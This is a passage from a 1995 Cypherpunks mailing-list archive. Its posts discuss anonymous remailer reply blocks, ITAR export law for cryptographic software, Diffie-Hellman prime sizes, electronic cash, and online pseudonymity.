 1Ju08hheCJ2nC0piiN/eT0eR646fMvKGI1CiitBKXPSSkPT6alYlQvLPxd+uV6YA
 AACBvZthKwNEb5DQg/5otGH3njgrJISEyvgEKDZaMFuOUPzxk4IZ4NXm0v2cgHVz
 yxMelKz4WHnOylmZ3WWTFmngukIdasIiFf5avRZ/A4Ff1FRXf7SpxvTfGpA4pYPE
 yjmFhsw/NCnRVqBAH65MiU0USQhPZkZDwLe6spBaJpxENq5C
 =/tbc
 -----END PGP MESSAGE-----

Trying the above, I find that it does *sort of* work as a reply block. If I append sample text and send everything to remailer at flame.alias.net, I get a reply back that looks like, for instance:

 Date: Mon, 6 Nov 1995 19:22:13 +0100
 From: Anonymous
 To: cardtris at umich.edu
 Subject: reply-block-test
 **

The appended text, which I expected to come back conventionally encrypted with 'apasswd', has just vanished into the void. Obviously I'm missing something... probably something that seemed painfully obvious to the writer of the remailer help file. If I omit the encryption key and '**', I can get reply blocks to work fine, even chained through multiple remailers.

Suggestions?

many thanks,

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Dept.
of Biology Jennifer Mansfield-Jones
University of Michigan cardtris at umich.edu
http://www-personal.umich.edu/~cardtris/cardtris.htm
^---- PGP key available

From mark at grondar.za Tue Nov 7 12:49:03 1995
From: mark at grondar.za (Mark Murray)
Date: Wed, 8 Nov 1995 04:49:03 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <199511071925.VAA01520@grumble.grondar.za>

>
> Mark Murray writes:
> > Hmm. Not only is this law unenforceable, it is unenforced. Anyone,
> > non-US or otherwise can buy crypto books - you just can't get the code
> > on floppy. Bruce Schneier went through this procedure when he CJ'ed
> > "Applied Cryptography".
>
> To my knowledge, Bruce Schneier never CJ'ed "Applied
> Cryptography". Phil Karn did that.

Point is, it got CJ'ed, and easily too. In fact I understand that the process was 'trivial'. Just the software on floppy was a problem.

M
--
Mark Murray
46 Harvey Rd, Claremont, Cape Town 7700, South Africa
+27 21 61-3768 GMT+0200
Finger mark at grumble.grondar.za for PGP key

From hfarkas at carfax.ims.advantis.com Tue Nov 7 12:52:57 1995
From: hfarkas at carfax.ims.advantis.com (Henry W. Farkas)
Date: Wed, 8 Nov 1995 04:52:57 +0800
Subject: Video as a source of randomness
In-Reply-To: <95Nov5.095208edt.917@cannon.ecf.toronto.edu>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 5 Nov 1995, SINCLAIR DOUGLAS N wrote:

> The cheapest strong source of video noise that I can think of would be
> a small fan with a ribbon tied to the grille. As long as it's in a
> turbulent flow regime, you'll get very random numbers at a fast rate.

Oh, I don't know about cheapest. Electricity costs money. How does $.32 per day sound to you?
I've come up with a successful algorithm that works like this: I generate a number based upon a random seed. To get the seed, I mail a letter in exactly the same bin at exactly noon Monday - Saturday at the US Post Office on Orange Street in New Haven, CT. The letter is always addressed to the exact same recipient. I simply record the number of days it takes for the letter to arrive. Guaranteed random.

===========================================================================
Henry W. Farkas | Me? Speak for IBM? Fat chance.
hfarkas at ims.advantis.com |------------------------------------------------
hfarkas at vnet.ibm.com | http://www.ims.advantis.com/~hfarkas
henry at nhcc.com | http://www.nhcc.com/~henry
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52 B3 80 34 1C CE 38 EC 53
Public key at: pgp-public-keys at pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
We'll just outlaw unlicensed cryptography. After all, it works in France.
You don't see weekly terrorist attacks there any more do you? - futplex -
===========================================================================

From junger at pdj2-ra.F-REMOTE.CWRU.Edu Tue Nov 7 12:56:20 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Wed, 8 Nov 1995 04:56:20 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To:
Message-ID:

Michael Froomkin writes:

: On Tue, 7 Nov 1995, Peter D.
Junger wrote:
:
: > I quite agree that no one can read the Arms Control Export Act as
: >authorizing the definition of export in the ITAR that requires, among
: >other things, that a foreign person get a license that the ACEA says
: >that he can't get, before disclosing cryptographic software to another
: >foreign person ``in the United States or abroad''.
: >
: > The ITAR violates not only the first amendment to the United States
: > Constitution, it also violates the separation of powers doctrine. But
: > it still says what it says. (And that is why it is unconstitutional.)
>
:
: [Note that this small disagreement between PDJ and me should not obscure
: our larger areas of agreement...]
:
: To reiterate my point in legalese: any court construing the ACEA would
: inevitably read the prohibition on "exporting" to a foreign person as not
: applying where the nation lacks jurisdiction. This is not even a case of
: applying a construction to save the constitutionality of the statute
: (since it could well take a narrower construction to do that). It's just
: common sense, which courts actually resort to on occasion.

I would admit that a court might do this in an effort to hold the statute constitutional, but a court might also hold the regulations unconstitutional because they are overbroad. Remember, the first amendment is the one area where one has standing to raise facial constitutional claims even though one's own constitutional rights are not infringed. Consider the case where a foreigner in the United States discloses to another foreigner, and is then prosecuted. Couldn't he raise the point in his defense?

(But of course the ITAR as applied to cryptographic software--and that is all that I am talking about--are so unconstitutional in so many different ways that nothing is going to turn on that one issue.)

But the real problem--to the extent that there is a real problem--is a more practical one.
What happens when some foreign person who has set up a large on-line archive of cryptographic software, in part just to twit the Americans, tries to immigrate to the United States? If he is excluded because he violated the export control laws, is he even going to get a court hearing? And if by some miracle he does get a court hearing, isn't the government going to (i) argue that he was conspiring with some Americans--which would make him indistinguishable from Noriega--and (ii) argue that he has to be covered, because one cannot distinguish his case from that of a foreign person who disclosed cryptographic software within the United States to another foreign person. (Remember, the regulation says ``within the United States or abroad''?)

: In short, in this particular case the ACEA, and by extension the ITAR,
: doesn't "say what it says" it "says what it must mean". This is an
: important way in which legal parsing differs from compiling...
: ,,,,,
:
: I'd be interested in hearing more about why you say the ITAR violates
: separation of powers: because it gives the executive branch too much power
: to define the elements of a criminal offense?

Not that. My point most simply is that the AECA does not say what the ITAR says, and that that is why the language of the ITAR violates the doctrine of separation of powers. Your argument--as I understand it--is that the courts will not construe the ACEA as authorizing the weird and unconstitutional definitions in the ITAR. My point is that the ACEA doesn't authorize the ITAR and that therefore the ITAR is unenforceable on separation of powers grounds.

I wrote an article about this twenty-five years ago arguing that the Pentagon Papers case can best be explained as a separation of powers case. In the opinions in that case, Near v. Minnesota was the most cited case, but Youngstown Sheet and Tube v. Sawyer came in a close second.
My conclusion was that when a court is confronted with a hard constitutional issue, the better part of valor is to decide the case on separation of powers grounds, if possible. In Pentagon Papers there was no congressional authority for the injunction sought; in the case of the ITAR there is no congressional authority for the definition of export as it applies to software (as opposed to hardware).

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu

From jya at pipeline.com Tue Nov 7 13:28:16 1995
From: jya at pipeline.com (John Young)
Date: Wed, 8 Nov 1995 05:28:16 +0800
Subject: CYB_lip
Message-ID: <199511071543.KAA24880@pipe2.nyc.pipeline.com>

11-7-95. Washrag: "Cyber Liberation."

The future of American politics is being decided in semiconductor plants in Santa Clara, in the cluttered offices of all-night software designers in Redmond, and, of course, all over the Internet. "At some point in the not-very-distant future," says Newt Gingrich, "somebody is going to have encryption you can't break.... Governments are not going to be able to stop it." This brave new world is closer than you think. It will drastically change the focus of politics because control will be extremely difficult, if not impossible. We're on the brink of a revolution that will make what the Republicans are doing this year look trivial beyond belief. The Internet has the potential to set us free -- to learn anything and do anything, whenever we want. No wonder politicians want to regulate it to death.

CYB_lip (7 kb)

From sjb at universe.digex.net Tue Nov 7 13:35:20 1995
From: sjb at universe.digex.net (Scott Brickner)
Date: Wed, 8 Nov 1995 05:35:20 +0800
Subject: lp ?
In-Reply-To:
Message-ID: <199511072043.PAA12012@universe.digex.net>

"Peter D. Junger" writes:
>"Perry E. Metzger" writes:
>
>:
>: Thaddeus J.
Beier writes:
>: > So, if this person was sending cryptographics codes from Switzerland
>: > to Israel, the code would have been imported to the US, then exported
>: > by UUNET. They can't do that, can they? Probably nobody would prosecute,
>: > but it might be something to threaten UUNET with if one of their Northern
>: > Virginia neighbors ever wanted something they couldn't get otherwise.
>:
>: It isn't clear that telecoms treaties don't implicitly make this legal
>: in spite of the export regulations.
>
>Once again, what the ITAR forbid is the disclosure of cryptographic
>software to a foreign person within or without the United States, so
>it does not make any difference whether the message containing the
>code passes through the United States or not.

OTOH, the ITAR explicitly permits "temporarily imported" munitions to be re-exported. Those clauses should entirely eliminate the issue of whether UUNET could be held liable under ITAR. ITAR says otherwise -- see section 120.18.

From hallam at w3.org Tue Nov 7 13:37:44 1995
From: hallam at w3.org (hallam at w3.org)
Date: Wed, 8 Nov 1995 05:37:44 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To:
Message-ID: <9511072043.AA12971@zorch.w3.org>

>> I would admit that a court might do this in an effort to hold the
>> statute constitutional, but a court might also hold the regulations
>> unconstitutional because they are overbroad. Remember, the first

>Technically, this is holding the regulations ultra vires, not
>unconstitutional; the difference matters.

I thought Peter was arguing that the separation of powers would be affected? Surely this would be a constitutional question?

On the strict ultra-vires question and enforcement on non US citizens may I suggest two hypotheticals?

Hypothetical A:

I develop a crypto system in Geneva and pass the source code to my co-worker. Neither of us have export certificates.

Hypothetical B:

I set up an anonymous FTP site to receive PGP from abroad.
It arrives and I hand it over to Fred who has agreed to distribute any material.

It seems to me that in Hypothetical B I am certainly acting in a manner which a US court might consider to be something the US government might seek to prevent. Effectively I would be trafficking. The fact that I only hand the goods over to non-US citizens would appear to be irrelevant.

Defining the precise distinction between what is covered and what is not is difficult. It is easier to draw the boundaries broadly and let the courts decide what is clearly outside the scope. It is not necessarily in the government's interests to have sharply defined lines

Phill

From sjb at universe.digex.net Tue Nov 7 13:42:03 1995
From: sjb at universe.digex.net (Scott Brickner)
Date: Wed, 8 Nov 1995 05:42:03 +0800
Subject: So much for free speech...[noise?]
In-Reply-To: <9511061846.AA21160@hplyot.obspm.fr>
Message-ID: <199511072047.PAA12140@universe.digex.net>

Laurent Demailly writes:
>"Freedom shall stops where starts the one of the others"
>That's what I learned, and what I think it is a "good thing",
>Thus, your freedom of speech shall stops where it starts hurting
>people
>
>[not that I support at all the childish way l^Hamericans sue everybody
>for anything, but I am happy that racists saying are not allowed and
>can be condemned in France.]

As a child, we all knew the maxim, "Sticks and stones can break my bones, but names will never hurt me." Why have we forgotten it as adults?

From froomkin at law.miami.edu Tue Nov 7 14:19:59 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Wed, 8 Nov 1995 06:19:59 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <9511072043.AA12971@zorch.w3.org>
Message-ID:

On Tue, 7 Nov 1995 hallam at w3.org wrote:

> >> I would admit that a court might do this in an effort to hold the
> >> statute constitutional, but a court might also hold the regulations
> >> unconstitutional because they are overbroad.
Remember, the first
>
> >Technically, this is holding the regulations ultra vires, not
> >unconstitutional; the difference matters.
>
> I thought Peter was arguing that the separation of powers would be
> affected? Surely this would be a constitutional question?

Yes, that's what he said; I don't agree.

>
> On the strict ultra-vires question and enforcement on non US citizens
> may I suggest two hypotheticals?
>
> Hypothetical A:
>
> I develop a crypto system in Geneva and pass the source code to my
> co-worker. Neither of us have export certificates.

No problem if neither of you are US persons (citizen/green card holder)

>
> Hypothetical B:
>
> I set up an anonymous FTP site to receive PGP from abroad. It arrives
> and I hand it over to Fred who has agreed to distribute any material.

No problem if you and Fred are non-US persons abroad. Big problem if Fred is in the US...

>
>
> It seems to me that in Hypothetical B I am certainly acting in a manner
> which a US court might consider to be something the US government might
> seek to prevent. Effectively I would be trafficking. The fact that I only
> hand the goods over to non-US citizens would appear to be irrelevant.

No, even our government doesn't seek to regulate crypto transfers between two foreign persons living outside the US! (It might attempt to get a foreign government to do something, but that's different.)

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.

From rah at shipwright.com Tue Nov 7 14:43:23 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Wed, 8 Nov 1995 06:43:23 +0800
Subject: (fwd) CIS TALK THIS THURSDAY, Nov 9th 4 p.m. in 518
Message-ID:

Sorry about the forward, but you'll see why in a sec...
Cheers,
Bob

--- begin forwarded text

Date: Tue, 7 Nov 1995 15:22:34 -0500
To: bsdc at ai.mit.edu
Subject: [joanne at theory.lcs.mit.edu: CIS TALK THIS THURSDAY, Nov 9th 4 p.m. in 518]
Sender: bounce-bsdc at ai.mit.edu
Precedence: bulk

From: joanne at theory.lcs.mit.edu (Joanne Talbot)
Date: Tue, 07 Nov 95 11:57:15 EST
To: theory-seminars at theory.lcs.mit.edu
Reply-To: theory-seminars-request at theory.lcs.mit.edu
Subject: CIS TALK THIS THURSDAY, Nov 9th 4 p.m. in 518

**Seminar of interest!!

CIS Seminar: Thursday, Nov. 9th
Place: NE43-518
Refreshments: 4:00 p.m.
Talk: 4:15 p.m.

Title: Electronic Cash
Author: Stefan Brands from CWI

Abstract: Two approaches for electronic payments prevail; one focusses on the secure transmission of credit card numbers and is account-based, while the other is token-based and tries to mimic the way coins or cheques are traded. The first approach can be realized using elementary cryptographic techniques, but offers at best anonymity of payments against merchants and requires on-line payment verification. On-line payment verification can be expensive and become the bottleneck of a large-scale implementation. The second approach, electronic cash, can offer full anonymity of payments, but requires fairly complex cryptographic techniques in order to guarantee security. Pioneering work in this area has been done by David Chaum. Unfortunately, his techniques are practical only for on-line electronic payments and hence less appropriate for large-scale implementation. In my presentation I will discuss the design of practical electronic cash systems that have off-line payment ability. Further information can be found on: http://www.cwi.nl/~brands/

Host: Ronald Rivest

--- end forwarded text

-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional."
--Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From rah at shipwright.com Tue Nov 7 14:48:30 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Wed, 8 Nov 1995 06:48:30 +0800
Subject: Sign my own certificates?
Message-ID:

>Oh jesus, I need to get myself a certificate for the netscape servers
>at work.
>
>All I need are three forms of identification, two written letters, an
>authorized signature, $300, mailed and faxed, along with an e-mail
>or two.
>
>I think this is an amazing pain in the ass.

You forgot about the sperm sample. I wouldn't necessarily consider that pain, though...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From lmccarth at cs.umass.edu Tue Nov 7 15:28:57 1995
From: lmccarth at cs.umass.edu (lmccarth at cs.umass.edu)
Date: Wed, 8 Nov 1995 07:28:57 +0800
Subject: DejaNews all over again
In-Reply-To: <199511062222.RAA14762@yakko.cs.wmich.edu>
Message-ID: <199511072307.SAA10176@thor.cs.umass.edu>

frogfarm at yakko.cs.wmich.edu writes:
[re: http://dejanews.com]
> Having said that, I'm greatly looking forward to the impending addition
> of the alt.* groups to their archives. Everyone is indeed a Kibo now,
> and the general public has become more aware of the need for reputations
> as a result.

They now have some alt.*. They've got my rmgroup of alt.wild.sex.with.cute.nonAIDSinfected.interesting.sonsofbitches, which suggests they've done a pretty thorough job for some time period.

As others have noted, this has clearly been coming for a long time. Pseudonymous accounts like Community Connexion's are a partial solution. But I expect an expansion of the market for strongly pseudonymous mail aliases, providing fewer services for cheaper rates.
It's not enough just to separate your True Name (verinym) from your name on the net. Many will want to use tentacles (*), er, separate pseudonyms for discussions in different parts of the net. After all, I might not want the c'punks to hear about my past life as a control freak (pun intended) in alt.config.

Just a reminder....

-L. Futplex McCarthy
Remailer Feedback Page: http://www.cs.umass.edu/~lmccarth/remailers/feedback.html

(*) Speaking of tentacles, Dejanews reveals that my name is on the long list of people whose signatures have been appropriated by Detweiler ;)

From srao at ISI.EDU Tue Nov 7 15:41:25 1995
From: srao at ISI.EDU (Santosh Rao)
Date: Wed, 8 Nov 1995 07:41:25 +0800
Subject: idle CPU markets
Message-ID: <199511072315.AA04909@zephyr.isi.edu>

> Date: Fri, 27 Oct 1995 06:25:34 -0700
> To: cypherpunks at toad.com
> From: Jay Campbell
> Subject: Re: idle CPU markets
> Sender: owner-cypherpunks at toad.com

> A graphic-arts chum of mine is really hyper about cycle sales - it will
> allow him to produce broadcast-quality commercials on a project-by-project
> basis without a huge initial hardware upgrade investment. Is anyone working
> on a Java library/demo/whatnot that allows plug-in algorithms, work
> completion 'fetch next batch' code, and some rudimentary authentication
> scheme? If not, I may tinker with this - if so, I'd like to chat :)

At USC/Information Sciences Institute, we are developing a system that will enable computer owners to sell or barter processor-cycles on the Internet. This is in some ways similar to what you talk about, in that it allows the execution of plug-in applications, and the policies for allocation and deallocation of remote resources are decided by the owners and are transparent to the end user. However, unlike Java, our applications are compiled C programs that execute on *compute servers* rather than on client machines. The application could in turn be an interpreter for some other language (e.g. Java).
We also support parallel applications that use the Parallel Virtual Machine (PVM) libraries for interprocess communication. We have implemented a prototype known as the Prospero Resource Manager (PRM); a parallel version of POVRAY raytracing program is one of the applications we've run using PRM.

We are currently working on integrating PRM with authentication and payment products (including kerberos, netcheque and netcash) developed as part of our other projects on security and electronic commerce. If you are interested in further information about any of these products, or are interested in participating in any aspect of PRM's development we'd be happy to talk to you. More information is also available on our web pages: http://nii-server.isi.edu/info/prm and http://nii-server.isi.edu/gost-group.

We also believe that one of the parallel applications for which PRM is useful is showing the weakness of certain encryption methods with limited key size. If anyone has suggestions for algorithms or software that might be included as a demo application in the next release of PRM, please contact me.

Santosh Rao.

From jimbell at pacifier.com Tue Nov 7 16:07:28 1995
From: jimbell at pacifier.com (jim bell)
Date: Wed, 8 Nov 1995 08:07:28 +0800
Subject: lp ?
Message-ID:

>"Peter D. Junger" writes:
>>"Perry E. Metzger" writes:
>>
>>:
>>: Thaddeus J. Beier writes:
>>: > So, if this person was sending cryptographics codes from Switzerland
>>: > to Israel, the code would have been imported to the US, then exported
>>: > by UUNET. They can't do that, can they? Probably nobody would prosecute,
>>: > but it might be something to threaten UUNET with if one of their Northern
>>: > Virginia neighbors ever wanted something they couldn't get otherwise.
>>:
>>: It isn't clear that telecoms treaties don't implicitly make this legal
>>: in spite of the export regulations.
>> >>Once again, what the ITAR forbid is the disclosure of cryptographic >>software to a foreign person within or without the United States, so >>it does not make any difference whether the message containing the >>code passes through the United States or not. > >OTOH, the ITAR explicitly permits "temporarily imported" munitions to >be re-exported. Those clauses should entirely eliminate the issue of >whether UUNET could be held liable under ITAR. ITAR says otherwise -- >see section 120.18. What if all traffic routed through the US was automatically modified, say, by inverting all bits, and then de-inverted after it exited the country. (a software flag would alert the systems to this). At the time it was exported, it would not be runnable code, nor compilable source code. Sure, somebody would claim that "it's easy to turn it into runnable code, just by XORing the file with ones." The response is obvious: Every 100K file is only a XOR away from every OTHER 100K file. From whitaker at sover.net Tue Nov 7 16:20:37 1995 From: whitaker at sover.net (Stephen Whitaker) Date: Wed, 8 Nov 1995 08:20:37 +0800 Subject: toolkits? Message-ID: <199511072351.SAA03354@maple.sover.net> Thanks, Daniel, for a thoughtful response. At 08:18 AM 11/7/95 CST, Daniel R. Oelke wrote: >First off - avoid trying to legislate minute details of any encryption >or signature scheme. Bureaucrats trying to understand, much less control >technical things is doomed to fail. (take GOSIP as a prime example) > I didn't mean to suggest that government would be responsible to get it right. It is possible to show them how it's done though. >Second - push for legal acceptance of digital signatures and >acceptance of privacy through encryption. I believe Utah has taken a strong >step in this direction. Most people, businesses, and courts won't accept >digital contracts and the like until there is more of a sound >set of laws behind them. This is good as it can be pitched as economic development. 
Any good models? Where to find the UTAH language? Pitfalls to watch out for? >Strong laws against government snooping or >against anti-encryption or anti-anonymous laws are a good thing IMO. This will probably be tough in the current environment. Again, any good language available? Fortunately Vermont is small enough where anyone can get a bill printed and introduced if it is properly drafted. What did the recent US Supreme court decide in support of anonymity? > >Third - provide services to the citizenry. For example - provide >a public key server. Or how about a digital time-stamping service. >If the crap was kept out of these services, and they were free for >anyone to use, then it would advance the idea of encouraging people to >use crypto in their daily lives. > Now we're getting specific. These are things that us ordinary folk can do which show the 'leaders' how to follow. What software, hardware, applications, support and sysadmin experience is required and where is it available on what terms? What are the cash flow opportunities to support such services? >Warning - Although I think there are some good things that governments >can do, it is also very important to watch out for "sabotage" by >the government. Governments tend to like control too much and by >trying to maintain control, reverse a useful service to one that >is a dis-service to the people. In general, if governments get >out of the way, people will take care of problems themselves. > Agreed. That's why after five or six years of trying to get the privacy laws passed, and watching government drag anchor, I started fishing the cypherpunks list for some pragmatic solutions to everyday situations. I'd still like to be pointed to some toolkits/reference works which will teach me how to access and use available information (or data) to map the net performance, message paths, transmission delay times, sniffers active, etc. -sw From zeus at pinsight.com Tue Nov 7 16:43:30 1995 From: zeus at pinsight.com (J. 
Kent Hastings) Date: Wed, 8 Nov 1995 08:43:30 +0800 Subject: [NOISE] Karl Hess/Schulman Events Message-ID: <199511080045.QAA27376@chico.pinsight.com> Visit Neil's page, http://www.pinsight.com/~zeus/jneil/ Here are places he'll be in Southern California this month to promote his new book. Contact Neil at jneil at genie.com for more information. > J. NEIL SCHULMAN APPEARANCES > > -------------------------------------------------------------------- > [Download Neil's Photo] [Download Cover] > > "SELF CONTROL Not Gun Control" > November, 1995 > > NOVEMBER, 1995 APPEARANCES > > * Friday Nov. 10, opening until close of show > Saturday Nov. 11, opening until 4 PM > Sunday Nov. 12, opening until close of show > Personal appearance / book autographing! > Great Western Gun Show > At Fairplex in Pomona, CA > Building 6, Table 7048 -- > next to Threat Management Institute / Peter Alan > Kasler > > * Saturday Nov. 18, afternoon > Personal appearance / book autographing! > Richard Kyle Books > 242 East 3rd Street > Long Beach, CA 90802 > Further Info: (310) 432-KYLE > > * Monday, Nov. 20, 7:00 PM dinner, 8:15 PM program > Speech: "SELF CONTROL Not Gun Control" > Karl Hess Club > Marie Callender's Restaurant 4356 Lincoln Blvd. > Marina Del Rey, CA $13.00 includes meeting, buffet > dinner with soup, salad bar, meatloaf entree & sides, > corn bread, choice of three pies & beverage, tax & > tip included. Reservations appreciated at (310) > 289-4126, 24 hours. > EMail for further info to agorist003 at aol.com. > > If you would like J. Neil Schulman to make a personal appearance at > your club meeting or store, Email: jneil at genie.com or Phone/fax: > 1-500-44-JNEIL (1-500-445-6345). If difficulty connecting, call > through AT&T 1-800-CALL-ATT then 500-445-6345. > > Return to J. Neil Schulman's Home Page. > -------------------------------------------------------------------- > HTML by J. Kent Hastings [Artist] , zeus at pinsight.com, > > 1354 East Ave. # R-108, Chico, CA 95926. 
Fax: (916) 893-1525. Kent -- "Put pages for your business on the World Wide Web, just $5 per month!" -- J. Kent Hastings -- zeus at pinsight.com -- http://www.pinsight.com/~zeus/ From djw at pdcorp.com Tue Nov 7 17:18:39 1995 From: djw at pdcorp.com (Dan Weinstein) Date: Wed, 8 Nov 1995 09:18:39 +0800 Subject: Exporting software doesn't mean exporting In-Reply-To: Message-ID: <199511080054.QAA29419@email.pdcorp.com> On Tue, 7 Nov 1995 14:52:33 +0100 (GMT+0100), you wrote: > > >On Tue, 7 Nov 1995, Peter D. Junger wrote: > >> >From Section 120.17 of the ITAR which provides: >> >> _Export_ means: >> . . . . >> (4) Disclosing (including oral or visual disclosure) or transfering >> technical data to a foreign person, whether in the United States or >> abroad . . . . > >The ITAR is U.S.-Law. This only applies (by definition) to US-citizens >or persons in the U.S.! > >I think it's a common mistake of many Americans that they believe >creating law means creating law for the whole world! What U.S. law says and what U.S. officials can enforce are two different things. You are in violation of ITAR if you send crypto software from Mexico to Europe over the INTERNET if it is routed through the U.S.. Think of it like drugs being shipped through the U.S., the drug lord that sent it through is just as guilty under U.S. law as the mule that is carrying it. The problem is that ITAR was not written to take the current situation into consideration. It is written to deal with physical equipment and concepts that only a small number of people understand. Given those parameters ITAR would work, but given the current climate of readily available crypto software and widespread understanding of crypto technologies ITAR cannot do what it was designed to do. > >> Go read the section that I quoted again. Where is there an exception >> for foreign persons who happen to be abroad? > >It's inherent. You simply can't apply US-law to non-US-citizens outside >the U.S.! Quite to the contrary, U.S. 
law applies wherever the U.S. can enforce it. There are many U.S. laws that the U.S. attempts to enforce outside the U.S.. One example is that the U.S. law allows the abduction of those who have murdered U.S. citizens outside the United States. This law is in place in an attempt to protect U.S. citizens from terrorism. If you do not believe me just ask Manuel Noriega (sp?). Dan Weinstein djw at pdcorp.com http://www.earthlink.net/~danjw PGP public key is available from my Home Page. All opinions expressed above are mine. "I understand by 'freedom of Spirit' something quite definite - the unconditional will to say No, where it is dangerous to say No. Friedrich Nietzsche From karn at qualcomm.com Tue Nov 7 18:07:19 1995 From: karn at qualcomm.com (Phil Karn) Date: Wed, 8 Nov 1995 10:07:19 +0800 Subject: Photuris Primality verification needed In-Reply-To: <1999.bsimpson@morningstar.com> Message-ID: <199511080143.RAA22564@servo.qualcomm.com> > Our practical experiences with discrete logs suggests that the effort > required to perform the discrete log precomputations in (a) is slightly > more difficult than factoring a composite of the same size in bits. In > 1990-91 we estimated that performing (a) for a k-bit prime modulus was > about as hard as factoring a k+32-bit composite. [Recent factoring work > has probably changed this a bit, but it's still a good estimate.] This is also my understanding, which I got from you in the first place. I take it there have been no dramatic breakthroughs in the last few years in the discrete log problem? How heavily has it been studied in comparison with factoring? Yes, in theory once an attacker spends enough time precomputing a table for a particular modulus he can then attack individual DH key exchanges with ease. This seems entirely analogous to attacking RSA. If you spend the time up front to factor my public RSA key, then you can also easily attack individual messages to me. 
So if I am willing to rely on a PGP key of, say, 1024 bits then I should be equally willing to rely on a 1024-bit DH modulus. Now there is admittedly a practical difference here -- people *can* change their PGP RSA keys occasionally, though this is hard to do when you have a lot of signatures. And each user has his/her own PGP RSA key, and cracking that gives you only the traffic to that user. A public DH modulus will be shared by many more people -- making it a much more tempting target. Still, requiring support of a fixed modulus for shared public use is important to promote a basic level of interoperability. This has its risks, but it should be okay *provided* it's a strong prime of sufficient strength to preclude the precomputation of the discrete log tables by even a highly motivated and resourceful attacker. And as a backup the protocol should provide for the optional use of private moduli between consenting parties. Sound reasonable? Phil From karn at qualcomm.com Tue Nov 7 18:07:27 1995 From: karn at qualcomm.com (Phil Karn) Date: Wed, 8 Nov 1995 10:07:27 +0800 Subject: Photuris Primality verification needed In-Reply-To: <1999.bsimpson@morningstar.com> Message-ID: <199511080146.RAA22568@servo.qualcomm.com> >Hilarie Orman posted that 512-bits only gives an order of 56-bits >strength, 1024-bits yields 80-bits strength, and 2048 yields 112-bits >strength. I do not have the facilities to verify her numbers. >As most of us agree that 56-bits is not enough (DES), the 512-bit prime >seems a waste of time and a tempting target. I'd like to drop it, but >Phil is inclined to keep it with a disclaimer. Well, since we already require 56-bit DES in ESP in the interests of promoting basic interoperability, wouldn't a 512-bit prime be similarly sufficient? Again, I'm *not* going to recommend that people use it, only provide it for those who simply cannot use larger moduli for whatever reason (export controls or CPU limits). 
Phil From frissell at panix.com Tue Nov 7 19:04:18 1995 From: frissell at panix.com (Duncan Frissell) Date: Wed, 8 Nov 1995 11:04:18 +0800 Subject: So much for free speech... Message-ID: <199511080238.VAA29423@panix.com> At 08:57 AM 11/6/95 -0800, Timothy C. May wrote: >Children are usually not accorded full constitutional protections, >especially not in public schools, but this does not mean the police should >arrest those who utter the wrong words! (Maybe suspending the student, >though I certainly wouldn't do that.) That's the rub. Kids can be kept locked up even with no crime. "Children don't have a right to liberty only a right to custody." An adult would probably not get arrested in the same circumstances (cops have more discretion to push kids around) or if arrested not prosecuted, or if prosecuted, case dismissed. It's a good thing the kid didn't engage in racist/Nazi acts like cutting government spending and taxes or they would have thrown the book at him. >This is the "safe and secure" world we are in, where bad thoughts and bad >words are punished. Or threatened with lawsuits. Anarchy seems infinitely >preferable to me. You got that right. DCF "Remind me to use an anonymous remailer in the future when indulging in racism." From frissell at panix.com Tue Nov 7 19:21:40 1995 From: frissell at panix.com (Duncan Frissell) Date: Wed, 8 Nov 1995 11:21:40 +0800 Subject: DejaNews all over again--a URL for Usenet Searching Message-ID: <199511080238.VAA29437@panix.com> At 12:28 PM 11/6/95 -0800, Timothy C. May wrote: > >I usually avoid passing on URLs of interesting sites, in the name of >conserving bandwidth (*), but this one really has me jazzed: > >http://dejanews.com/ > >It allows searching of Usenet archives (a few months' worth, from what I >can see). I'm not impressed since I've been using the subscription version of Infoseek for a while now which lets you search the last month of News and includes mailing lists as well (including cypherpunks). 
The free version is behind the Net Search button on Netscape but only searches the Web. http://www.infoseek.com A search for tcmay at got.net produced more than 200 hits. My Tim you *do* get around. Modesty prevents me from mentioning any newsgroup names. DCF From anonymous-remailer at shell.portal.com Tue Nov 7 19:28:16 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Wed, 8 Nov 1995 11:28:16 +0800 Subject: DejaNews all over again Message-ID: <199511080306.TAA10540@jobe.shell.portal.com> On Tue, 7 Nov 1995 lmccarth at cs.umass.edu wrote: > your True Name (verinym) from your name on the net. > Many will want to use > tentacles (*), er, separate pseudonyms for discussions in different parts of > the net. After all, I might not want the c'punks to hear about my past life > as a control freak (pun intended) in alt.config. Just a reminder.... > > (*) Speaking of tentacles, Dejanews reveals that my name is on the long list > of people whose signatures have been appropriated by Detweiler ;) You too, eh?? I wish that Detweiler could (seriously) go back to wherever he came from. Hopefully this time, he can make the attempt ... backwards. I no longer become incensed at his type of spoofing. I understand that a message may look like it appears to come from a site, but it in fact doesn't. Who really knows?? Even a message that is PGP signed isn't guaranteed to be from the person who apparently 